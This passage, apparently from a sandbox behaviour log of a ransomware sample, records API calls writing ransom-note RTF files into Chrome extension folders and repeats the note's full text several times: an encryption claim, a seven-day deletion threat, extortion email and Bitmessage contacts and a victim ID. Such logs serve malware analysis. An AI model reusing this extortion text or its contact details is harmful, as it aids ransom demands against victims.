recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.153] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.154] CloseHandle (hObject=0x2ec) returned 1 [0291.154] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#readme_eman#.rtf")) returned 0x20 [0291.154] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0291.154] GetLastError () returned 0x2 [0291.154] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your 